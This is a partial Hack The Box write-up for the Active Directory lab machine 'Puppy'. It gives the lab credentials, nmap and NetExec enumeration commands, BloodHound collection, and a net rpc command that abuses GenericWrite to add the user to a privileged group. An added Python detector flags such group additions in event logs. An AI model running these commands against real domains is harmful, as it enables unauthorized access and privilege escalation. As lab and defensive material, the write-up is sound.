Puppy-htb
xone 3 months ago

Puppy HTB Writeup | HacktheBox | Season 8

Hi hackers and cybersecurity enthusiasts! As you all know, Hack The Box Season 8 has started, and the first box is 'Puppy'. It's a Windows-based machine, and we can practice Active Directory scenarios on it — such as password resets, credential spraying, DCSync attacks, cracking password-protected notes, and much more.

Machine Information

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

🧾 Enumeration

Run a comprehensive TCP scan:

nmap -v -sCTV -p- -T4 -Pn -oN $IP.txt $IP

53/tcp    open   domain         Simple DNS Plus
88/tcp    open   kerberos-sec   Microsoft Windows Kerberos (server time: 2025-05-18 23:03:58Z)
111/tcp   open   rpcbind        2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open   msrpc          Microsoft Windows RPC
139/tcp   open   netbios-ssn    Microsoft Windows netbios-ssn
389/tcp   open   ldap           Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http     Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
2049/tcp  open   nlockmgr       1-4 (RPC #100021)
2847/tcp  closed aimpp-port-req
3260/tcp  open   iscsi?
3268/tcp  open   ldap           Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6127/tcp  closed unknown
7321/tcp  closed swx
9389/tcp  open   mc-nmf         .NET Message Framing
15528/tcp closed unknown
21928/tcp closed unknown
23599/tcp closed unknown
23918/tcp closed unknown
29431/tcp closed unknown
33224/tcp closed unknown
39889/tcp closed unknown
48207/tcp closed unknown
49664/tcp open   msrpc          Microsoft Windows RPC
49667/tcp open   msrpc          Microsoft Windows RPC
49670/tcp open   ncacn_http     Microsoft Windows RPC over HTTP 1.0
49685/tcp open   tcpwrapped
51736/tcp open   msrpc          Microsoft Windows RPC
51778/tcp open   msrpc          Microsoft Windows RPC
52819/tcp open   tcpwrapped
56992/tcp closed unknown
61461/tcp open   tcpwrapped
63665/tcp closed unknown
Update /etc/hosts

echo "xx.xx.xx.xx DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts

Spray attack

As you know, we already have credentials for a low-privileged account, so first we validate them against SMB with NetExec (nxc); the same command, given a user list, is what a password spray would use.

nxc smb $IP  -u levi.james  -p 'KingofAkron2025!'

SMB Enumeration

We know that with the help of the credentials, we're able to log in to SMB. Now, we want to check whether we can find any juicy information on the SMB server. For example, we might look for writable directories, shared drives, or sensitive files.

In an Active Directory environment, finding SMB access can lead to several possible scenarios:

  • Access to shared folders containing credentials, config files, or password notes.
  • Enumeration of user and group information from readable shares like NETLOGON or SYSVOL.
  • Uploading files to writable shares that could be used for lateral movement or privilege escalation (e.g., planting a malicious script).
  • Discovering login scripts or GPO files that contain plaintext credentials.
  • Checking for misconfigured permissions that allow overwriting existing files.

So, let’s enumerate the shares thoroughly and analyze them for any of these opportunities.

Enumerating SMB Shares

Next, we enumerate the available SMB shares to identify accessible resources:

nxc smb $IP -u levi.james -d PUPPY.HTB -p 'KingofAkron2025!' --shares

🧾 Output:

[*] Enumerated shares
Share       Permissions     Remark
-----       -----------     ------
ADMIN$                      Remote Admin
C$                          Default share
DEV                         DEV-SHARE for PUPPY-DEVS
IPC$        READ            Remote IPC
NETLOGON    READ            Logon server share
SYSVOL      READ            Logon server share

🧱 DEV Share Access Denied — What Next?

Although we successfully authenticated to the SMB service as levi.james, the DEV share is listed with no permissions at all, so access to it is denied, most likely because the account is not in the group that is granted access.

🧠 Strategy: Identify a Privileged User via BloodHound

To determine which user or group has access to the DEV share, we’ll collect Active Directory enumeration data and analyze it using Bloodhound.

🔧 Step-by-Step: Dump Bloodhound Data via NXC

NetExec's BloodHound ingestor lives under the ldap protocol:

nxc ldap $IP -u levi.james -p 'KingofAkron2025!' -d PUPPY.HTB --bloodhound --collection RDP,Session,DCOM,LocalAdmin

Bloodhound

🧠 Bloodhound Analysis

From the graph:

🎯 Goal

We want to gain access to the DEV SMB share, which is likely restricted to members of the DEVELOPERS@PUPPY.HTB group.

🪜 Step-by-Step Attack Path

🔹 Step 1: Leverage GenericWrite Over DEVELOPERS Group

GenericWrite on a group allows us to modify its attributes, including the member attribute, so we can add a user to the group.

➡️ So, we will add levi.james to the DEVELOPERS@PUPPY.HTB group using this privilege.

net rpc group ADDMEMBERS "DEVELOPERS" levi.james -U "levi.james%KingofAkron2025!" -S $IP

Reconnect to SMB and Access the DEV Share

Now that levi.james is a member of the DEVELOPERS group (which likely has access to the DEV share), re-authenticate and check the access:

smbclient //$IP/DEV -U "levi.james"
# OR using nxc again
nxc smb $IP -u levi.james -p 'KingofAkron2025!' -d PUPPY.HTB --shares
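The membership change made in Step 1 is exactly what a defender should be alerting on: on the domain controller it is recorded as Security Event ID 4728 (member added to a security-enabled global group; 4732 and 4756 are the local- and universal-group variants). The detector below is an added example, not part of the original writeup; the event records, SIDs and the watched-group list are constructed, but the field names are those of the real event.

```python
"""Flag member additions to sensitive AD groups in Windows Security events.

Added example, not part of the original writeup. The records below are
constructed, not real DC logs, but use the real 4728 event's field names."""
import json

# Groups whose membership changes always deserve review (assumed list).
WATCHED_GROUPS = {"DEVELOPERS", "DOMAIN ADMINS", "ENTERPRISE ADMINS"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}

# Constructed sample records, one JSON object per line; SIDs are made up.
SAMPLE_EVENTS = """\
{"EventID": 4728, "TimeCreated": "2025-05-18T23:10:01Z", "SubjectUserName": "levi.james", "SubjectUserSid": "S-1-5-21-1-2-3-1103", "TargetUserName": "DEVELOPERS", "MemberName": "CN=Levi James,CN=Users,DC=PUPPY,DC=HTB", "MemberSid": "S-1-5-21-1-2-3-1103"}
{"EventID": 4624, "TimeCreated": "2025-05-18T23:10:05Z", "SubjectUserName": "levi.james", "SubjectUserSid": "S-1-5-21-1-2-3-1103", "TargetUserName": "-", "MemberName": "-", "MemberSid": "-"}
{"EventID": 4728, "TimeCreated": "2025-05-18T23:12:40Z", "SubjectUserName": "svc_admin", "SubjectUserSid": "S-1-5-21-1-2-3-1200", "TargetUserName": "HELPDESK", "MemberName": "CN=New Hire,CN=Users,DC=PUPPY,DC=HTB", "MemberSid": "S-1-5-21-1-2-3-1350"}
"""


def member_cn(distinguished_name):
    """Return the leading CN of a distinguished name, or the input unchanged."""
    first = distinguished_name.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def find_sensitive_group_adds(raw_lines):
    """Return one alert per addition to a watched group.

    self_add is set when the actor and the added member share a SID: a
    low-privilege account granting itself membership, as in Step 1 above,
    is the pattern to escalate first."""
    alerts = []
    for line in raw_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["EventID"] not in GROUP_ADD_EVENTS:
            continue
        group = ev["TargetUserName"].upper()
        if group not in WATCHED_GROUPS:
            continue
        alerts.append({
            "time": ev["TimeCreated"],
            "actor": ev["SubjectUserName"],
            "group": group,
            "member": member_cn(ev["MemberName"]),
            "self_add": ev["SubjectUserSid"] == ev["MemberSid"],
        })
    return alerts
```

Running `find_sensitive_group_adds(SAMPLE_EVENTS)` yields a single alert for the DEVELOPERS addition with `self_add` set; the HELPDESK addition by a different account is filtered out because HELPDESK is not on the watched list.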


Access to the rest of this writeup is restricted by Hack The Box rules. The full solution can be published after the machine is retired.